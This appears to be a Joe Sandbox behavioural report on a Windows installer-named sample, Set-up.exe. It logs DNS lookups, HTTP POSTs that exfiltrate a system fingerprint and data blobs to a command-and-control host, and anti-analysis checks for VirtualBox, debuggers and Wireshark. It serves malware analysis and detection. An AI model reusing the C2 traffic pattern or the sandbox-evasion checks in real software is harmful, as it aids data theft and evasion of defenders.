Dec 31, 2024 00:33:07.566932917 CET	50381	53	192.168.2.4	1.1.1.1
Dec 31, 2024 00:33:07.566978931 CET	50381	53	192.168.2.4	1.1.1.1
Dec 31, 2024 00:33:08.508905888 CET	53	50381	1.1.1.1	192.168.2.4
Dec 31, 2024 00:33:08.508919001 CET	53	50381	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 00:32:58.594719887 CET	192.168.2.4	1.1.1.1	0xf082	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 31, 2024 00:32:58.594768047 CET	192.168.2.4	1.1.1.1	0xf3ff	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 31, 2024 00:33:02.106849909 CET	192.168.2.4	1.1.1.1	0x957f	Standard query (0)	home.eleventj11vt.top	A (IP address)	IN (0x0001)	false
Dec 31, 2024 00:33:02.106909990 CET	192.168.2.4	1.1.1.1	0x471a	Standard query (0)	home.eleventj11vt.top	28	IN (0x0001)	false
Dec 31, 2024 00:33:06.060652018 CET	192.168.2.4	1.1.1.1	0x18d8	Standard query (0)	home.eleventj11vt.top	A (IP address)	IN (0x0001)	false
Dec 31, 2024 00:33:06.060710907 CET	192.168.2.4	1.1.1.1	0xc961	Standard query (0)	home.eleventj11vt.top	28	IN (0x0001)	false
Dec 31, 2024 00:33:07.566932917 CET	192.168.2.4	1.1.1.1	0x8c05	Standard query (0)	home.eleventj11vt.top	A (IP address)	IN (0x0001)	false
Dec 31, 2024 00:33:07.566978931 CET	192.168.2.4	1.1.1.1	0x51ca	Standard query (0)	home.eleventj11vt.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 00:32:58.601954937 CET	1.1.1.1	192.168.2.4	0xf082	No error (0)	httpbin.org	52.202.253.164	A (IP address)	IN (0x0001)	false
Dec 31, 2024 00:32:58.601954937 CET	1.1.1.1	192.168.2.4	0xf082	No error (0)	httpbin.org	34.197.122.172	A (IP address)	IN (0x0001)	false
Dec 31, 2024 00:33:02.965569019 CET	1.1.1.1	192.168.2.4	0x957f	No error (0)	home.eleventj11vt.top	194.87.58.155	A (IP address)	IN (0x0001)	false
Dec 31, 2024 00:33:06.563453913 CET	1.1.1.1	192.168.2.4	0x18d8	No error (0)	home.eleventj11vt.top	194.87.58.155	A (IP address)	IN (0x0001)	false
Dec 31, 2024 00:33:08.508919001 CET	1.1.1.1	192.168.2.4	0x8c05	No error (0)	home.eleventj11vt.top	194.87.58.155	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.eleventj11vt.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	194.87.58.155	80	2688	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 00:33:02.972390890 CET	12360	OUT	POST /jQURilAbAxjhrGAaBiUq1735578716 HTTP/1.1 Host: home.eleventj11vt.top Accept: / Content-Type: application/json Content-Length: 577923 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 33 30 31 38 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317430187", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 31, 2024 00:33:02.977345943 CET	4944	OUT	Data Raw: 5c 2f 77 44 50 36 5c 2f 35 39 47 31 59 72 39 67 5c 2f 2b 43 59 33 37 45 76 77 51 5c 2f 61 31 38 48 5c 2f 46 62 55 5c 2f 69 78 46 34 73 46 39 34 4a 38 52 2b 47 37 44 53 4a 5c 2f 43 5c 2f 69 46 64 47 4d 6c 70 72 65 6d 36 6c 63 58 45 56 39 48 50 59 Data Ascii: \/wDP6\/59G1Yr9g\/+CY37EvwQ\/a18H\/FbU\/ixF4sF94J8R+G7DSJ\/C\/iFdGMlprem6lcXEV9HPYalDN5M2mI1s8UVvIv2i4Wd518hYPz\/AMTPEjI\/CrhatxdxDhM2xmW0cbg8DKhk1DB4jHOtjZyp0pRp47HZdQdOLi3UbxKklblhN6H6n4ReFHEfjRxlQ4H4XxuS4DNa+X4\/MYYjP8TjsLlyoZfThUrQlVy7Ls1x
Dec 31, 2024 00:33:02.977387905 CET	7416	OUT	Data Raw: 5c 2f 33 6e 2b 65 66 74 58 39 66 5c 2f 72 30 32 53 4d 5c 2f 4a 38 2b 48 48 2b 66 7a 71 4a 37 66 50 39 47 62 30 2b 76 79 5c 2f 55 68 38 7a 63 32 7a 2b 4d 5c 2f 38 41 50 4d 5c 2f 36 37 50 38 41 6e 31 39 36 68 71 5a 74 38 68 65 50 74 4a 39 66 33 50 Data Ascii: \/3n+eftX9f\/r02SM\/J8+HH+fzqJ7fP9Gb0+vy\/Uh8zc2z+M\/8APM\/67P8An196hqZt8hePtJ9f3P06\/wCe3NM67\/kk3\/8APOP05\/znisjop9fl+pWOzzHcf9s5Ixz7\/wCfp9KbFvk8n+BP+mfH+c\/54qVsyb0\/8h\/4\/X\/PFQ4\/g\/j8rypf3X\/Lv\/np6YroNCHzN3+2JIv3v2j\/AD\/h7ULHPt3j5\/
Dec 31, 2024 00:33:02.977473021 CET	9888	OUT	Data Raw: 2b 78 31 38 55 72 48 34 50 5c 2f 77 44 42 4f 4c 39 6e 76 78 76 66 2b 47 5c 2f 45 5c 2f 6a 41 66 5a 66 43 48 67 33 54 50 43 5c 2f 67 30 65 47 5c 2f 2b 45 6b 31 33 78 4a 38 54 66 6a 6a 48 38 4d 66 43 6d 6d 36 64 4a 34 77 38 52 2b 45 50 44 46 76 39 Data Ascii: +x18UrH4P\/wDBOL9nvxvf+G\/E\/jAfZfCHg3TPC\/g0eG\/+Ek13xJ8TfjjH8MfCmm6dJ4w8R+EPDFv9o8T+LtIW8vNb8S6RYWVh9qu5rr9yI5Po1vj38Uz\/AM2U\/tNYByf+Kr\/Y159B\/wAnbY\/z7V8OfBB8\/wDBMj9kzqf+L2\/sgjHOPl\/b++Fo9AO3rXK\/8FFP+Csmk\/si\/E3wB8JPhto+jfEDxfY67o3iD4
Dec 31, 2024 00:33:02.981987000 CET	2472	OUT	Data Raw: 33 6a 48 78 6c 34 7a 2b 48 6e 6a 6a 34 68 33 58 6a 7a 56 4c 54 34 58 2b 46 5c 2f 43 76 69 76 55 5c 2f 45 7a 61 52 64 32 4b 61 64 65 33 39 39 39 30 5c 2f 38 45 72 50 32 52 5c 2f 6a 37 38 4f 5c 2f 6a 5a 2b 30 4a 38 62 5c 2f 32 6d 50 42 76 77 31 62 Data Ascii: 3jHxl4z+Hnjj4h3XjzVLT4X+F\/CvivU\/EzaRd2Kade39990\/8ErP2R\/j78O\/jZ+0J8b\/2mPBvw1b4mt4h0TwJrXxP8VfCrxO37Qfj3xVB+zh+y1beLvFXg3433ni238K698A9Z8XaX43tk0vRvAmoy3nj6y8RXUfjXy4L3Q7T8owmFw2Bw2HwWCoUsLhMLRp4fDYehCNOjQo0oqFOlThFKMYQikopKySPpc7zvOOJc4zP
Dec 31, 2024 00:33:02.982182026 CET	2472	OUT	Data Raw: 33 68 66 5c 2f 68 4e 76 44 76 37 50 4f 73 66 45 53 39 2b 41 48 68 33 78 75 4e 48 75 72 36 4d 65 4d 74 45 2b 47 64 68 34 6e 46 39 71 57 72 61 79 4e 56 47 74 61 74 71 57 6f 58 58 43 65 48 66 2b 43 65 50 37 49 76 68 62 51 5c 2f 69 4a 34 58 30 72 34 Data Ascii: 3hf\/hNvDv7POsfES9+AHh3xuNHur6MeMtE+Gdh4nF9qWrayNVGtatqWoXXCeHf+CeP7IvhbQ\/iJ4X0r4Z63L4X+Jnw58XfB7V\/DOu\/F741+KvDnhL4TePWZ\/GHwy+C2g+KPiLrGk\/s8+ANfK2IvvCHwEtPhtoDLoXhZI7CNPCXhldJAPB\/2eP2iv21PiH+3L8QPhl8Wfhh8FPAfwXsf2X\/gh8VrDw14U+PWufETxN4S
Dec 31, 2024 00:33:02.982243061 CET	6180	OUT	Data Raw: 2f 71 70 4a 50 38 41 32 31 78 31 36 65 76 30 71 48 35 78 47 36 62 34 33 65 54 75 49 72 58 30 5c 2f 77 41 66 38 2b 6e 51 64 42 57 6b 32 65 55 38 53 66 38 41 4c 50 38 41 31 73 66 5c 2f 41 43 33 48 66 5c 2f 53 37 76 50 70 78 37 55 79 53 4e 56 6d 64 Data Ascii: /qpJP8A21x16ev0qH5xG6b43eTuIrX0\/wAf8+nQdBWk2eU8Sf8ALP8A1sf\/AC3Hf\/S7vPpx7UySNVmdP3myT\/lpJ+\/n6\/y\/nUwH7uFNlx\/2z\/f2\/wCf+elM\/vv+8Tv5n\/tr\/njpQdBD5fmK\/kp8+fNH7r68j\/P4Zojj+588Y8z\/AJZ+V\/5K9f8AP40SQwssb7M9f8\/5\/XueXIsab0kmT\/W++fXr6f5P
Dec 31, 2024 00:33:02.982269049 CET	6180	OUT	Data Raw: 46 54 78 4e 43 74 4b 64 4b 6e 55 6a 55 66 37 4b 6e 5c 2f 41 49 4c 58 5c 2f 74 45 5c 2f 77 5c 2f 43 7a 34 48 6a 36 36 64 38 51 44 5c 2f 4c 78 2b 74 52 6e 5c 2f 67 74 64 2b 30 64 5c 2f 44 38 4c 5c 2f 41 49 46 6a 36 36 54 38 51 7a 5c 2f 4c 34 69 72 Data Ascii: FTxNCtKdKnUjUf7Kn\/AILX\/tE\/w\/Cz4Hj66d8QD\/Lx+tRn\/gtd+0d\/D8L\/AIFj66T8Qz\/L4irX4++Lx4U8C6fqMPjD4zfArwr8Q9CtvCV94o+C3iDxN8S7b4neErTxjrmg6Xp8fiKXSvg\/rPwwtfEWm6V4j07xd4k+H9n8S7\/4k+HNAj1S11bwda+KtF1Xw1aLZaPqV74+8U\/DN9R8H6N4s8H\/ALRPw3\/ZY1d
Dec 31, 2024 00:33:03.025193930 CET	34608	OUT	Data Raw: 7a 66 32 63 76 2b 79 6d 61 4e 5c 2f 77 43 67 33 46 66 49 73 6e 62 38 66 36 56 39 64 66 73 42 5c 2f 77 44 4a 35 76 37 4f 58 5c 2f 5a 54 4e 47 5c 2f 39 42 75 4b 5c 2f 50 50 46 33 5c 2f 6b 30 5c 2f 69 66 38 41 39 6d 38 34 31 5c 2f 38 41 57 62 7a 49 Data Ascii: zf2cv+ymaN\/wCg3FfIsnb8f6V9dfsB\/wDJ5v7OX\/ZTNG\/9BuK\/PPF3\/k0\/if8A9m841\/8AWbzI\/SfCCd\/FrwuVt\/EXgnr\/ANVLlnkf21UUUV\/hUf7vhRRRQB4JdftV\/svWXxjh\/Z2vP2kPgJaftA3Fxb2kHwLuvjB8PIPjHPdXeir4ltbaH4Yy+Ik8bSXFz4dZdft4U0RpJtFZdVjVrEievc7y8tNPtLq\/v
Dec 31, 2024 00:33:03.073389053 CET	1236	OUT	Data Raw: 5c 2f 4c 33 72 35 59 31 57 34 5c 2f 34 71 7a 78 4c 7a 5c 2f 7a 4d 4f 73 6a 75 4d 48 2b 30 62 72 42 7a 37 34 35 7a 5c 2f 53 76 2b 47 6a 6a 71 6c 68 76 5a 34 58 46 52 70 51 6a 6a 50 72 48 73 61 6c 65 50 75 7a 71 55 6e 53 6c 4b 4d 4b 74 72 4b 6f 36 Data Ascii: \/L3r5Y1W4\/4qzxLz\/zMOsjuMH+0brBz745z\/Sv+GjjqlhvZ4XFRpQjjPrHsalePuzqUnSlKMKtrKo6bilCck6ii3TcuSMIx\/wC2PIpVH7ajKUnRVPnjBu6hLmirxvrHmUm5L4W9bczlf0HTJc7eTg9fx\/8Ar9fx9a\/lq\/aLOf2gvjqfX4yfE4\/n421yv6hNJk+7z6H8yOP0\/L2xX8vP7RBz+0B8cz6\/GL4m\/wDq
Dec 31, 2024 00:33:03.125004053 CET	1236	OUT	Data Raw: 37 5a 49 64 52 30 66 55 62 35 49 6e 6e 74 78 64 4c 62 5c 2f 61 72 59 7a 66 7a 35 66 38 41 42 5a 6e 5c 2f 41 4a 53 43 2b 42 50 2b 7a 4e 5c 2f 43 5c 2f 77 44 36 75 7a 34 6f 31 2b 5c 2f 65 42 4f 64 30 31 34 35 2b 43 4f 66 38 4f 35 72 4b 4e 57 72 78 Data Ascii: 7ZIdR0fUb5InntxdLb\/arYzfz5f8ABZn\/AJSC+BP+zN\/C\/wD6uz4o1+\/eBOd0145+COf8O5rKNWrx\/Q4exGOyvFuKxeUZvhMwwed5Fj3Rly4nA4idGhPFZfilKFPHYHB4r2cMZgsPUpfyr43cK55lX0ZvpkeGviLwxXoYL\/iXzM\/EGnwzxTlT\/wBg4q4TzLh7O+BOOsmpYylz4HOsBh8fjaeT8R5ZKnWxOQZ7nGWQx
Dec 31, 2024 00:33:06.035794020 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Mon, 30 Dec 2024 23:33:05 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	194.87.58.155	80	2688	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 00:33:06.625931978 CET	101	OUT	GET /jQURilAbAxjhrGAaBiUq1735578716?argument=0 HTTP/1.1 Host: home.eleventj11vt.top Accept: /
Dec 31, 2024 00:33:07.547981024 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Mon, 30 Dec 2024 23:33:07 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	194.87.58.155	80	2688	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 00:33:08.515726089 CET	174	OUT	POST /jQURilAbAxjhrGAaBiUq1735578716 HTTP/1.1 Host: home.eleventj11vt.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 31, 2024 00:33:09.893620014 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Mon, 30 Dec 2024 23:33:09 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	52.202.253.164	443	2688	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 23:32:59 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-30 23:32:59 UTC	224	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 23:32:59 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-30 23:32:59 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	18:32:57
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0xa60000
File size:	7'101'064 bytes
MD5 hash:	AE8ED41BD6AAAE48CA2B4615D20F52DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	39.1%
Total number of Nodes:	1083
Total number of Limit Nodes:	64

Executed Functions

Function 00A9A550 Relevance: 67.3, APIs: 23, Strings: 15, Instructions: 777networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A7D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00A701B1), ref: 00A7D8E2

setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 00A9A670
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A6A1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A6AB
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A6AF

Part of subcall function 00A7D090: GetLastError.KERNEL32 ref: 00A7D0A1
Part of subcall function 00A7D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D0A9
Part of subcall function 00A7D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D0CD
Part of subcall function 00A7D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D0D7
Part of subcall function 00A7D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 00A7D381
Part of subcall function 00A7D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 00A7D3A2
Part of subcall function 00A7D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D3BF
Part of subcall function 00A7D090: GetLastError.KERNEL32 ref: 00A7D3C9
Part of subcall function 00A7D090: SetLastError.KERNEL32(00000000), ref: 00A7D3D4

Part of subcall function 00AA4F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00AA4F9E

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00A9A831
WSAGetLastError.WS2_32 ref: 00A9A854
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00A9A97A
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00A9A9A6
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A9AB0F
htons.WS2_32(?), ref: 00A9AC01
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00A9AC38
setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00A9AC64
WSAGetLastError.WS2_32 ref: 00A9ACDC
WSAGetLastError.WS2_32 ref: 00A9ADF5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 00A9AE9D
htons.WS2_32(?), ref: 00A9AEDB
bind.WS2_32(?,00000002,00000010), ref: 00A9AEF5
WSAGetLastError.WS2_32 ref: 00A9AFB9
htons.WS2_32(?), ref: 00A9AFFC
bind.WS2_32(?,?,?), ref: 00A9B014
WSAGetLastError.WS2_32 ref: 00A9B056
htons.WS2_32(?), ref: 00A9B0D2
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 00A9B0EA

Strings

Couldn't bind to '%s' with errno %d: %s, xrefs: 00A9AE1F
Could not set TCP_NODELAY: %s, xrefs: 00A9A871
Name '%s' family %i resolved to '%s' family %i, xrefs: 00A9ADAC
cf-socket.c, xrefs: 00A9A5CD, 00A9A735
Trying %s:%d..., xrefs: 00A9A7C2, 00A9A7DE
@, xrefs: 00A9A8F4
Bind to local port %d failed, trying next, xrefs: 00A9AFE5
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00A9A6CE
Local port: %hu, xrefs: 00A9AF28
cf_socket_open() -> %d, fd=%d, xrefs: 00A9A796
Trying [%s]:%d..., xrefs: 00A9A689
bind failed with errno %d: %s, xrefs: 00A9B080
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00A9AD0A
@, xrefs: 00A9AC42
Local Interface %s is ip %s using address family %i, xrefs: 00A9AE60

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 2815861332-2373386790
Opcode ID: 17ec5736f00ce3e99a77aaa3d3caaa9d7e654f276afc55a7c743f55dd7b7d77c
Instruction ID: 7a70b5faf2d586b51620a1d5603675e6e19ade2e504953add5ab21c4159e7e2b
Opcode Fuzzy Hash: 17ec5736f00ce3e99a77aaa3d3caaa9d7e654f276afc55a7c743f55dd7b7d77c
Instruction Fuzzy Hash: 1062F271604340AFEB20CF24D846BAAB7F4BF95314F04451AF9899B292E771E945CBD3

Function 00A629FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 00A62A27
RegOpenKeyExA.KERNELBASE ref: 00A62A8A
CharUpperA.USER32 ref: 00A62AEF
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A62B05
CreateToolhelp32Snapshot.KERNEL32 ref: 00A62B6D
Process32First.KERNEL32 ref: 00A62B88
Process32Next.KERNEL32 ref: 00A62BC0
QueryFullProcessImageNameA.KERNELBASE ref: 00A62C26
CloseHandle.KERNELBASE ref: 00A62C49
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A62C5F
CreateToolhelp32Snapshot.KERNEL32 ref: 00A62CC4
Process32First.KERNEL32 ref: 00A62CDF
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A62D0D
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A62D42
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A62D5C
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A62D76
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A62D90
Process32Next.KERNEL32 ref: 00A62DBF
CloseHandle.KERNELBASE ref: 00A62DFC
EnumWindows.USER32 ref: 00A62E21

Strings

dbg_third, xrefs: 00A62E48
dbg, xrefs: 00A62C80
ida.exe, xrefs: 00A62D7F
vbox_second, xrefs: 00A62AAB
C:\USERS\PUBLIC\, xrefs: 00A62AF4
WINDBG.EXE, xrefs: 00A62C4E
public_check, xrefs: 00A62B26
yadro, xrefs: 00A62EFB
wireshark.exe, xrefs: 00A62D31
SYSTEM\ControlSet001\Services\VBoxSF, xrefs: 00A62A76
vbox_first, xrefs: 00A62A49
x64dbg.exe, xrefs: 00A62D65
procmon.exe, xrefs: 00A62D4B
C:\Windows\System32\VBox*.dll, xrefs: 00A62A1B
dbg_sec, xrefs: 00A62DDE
0, xrefs: 00A62DA9

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
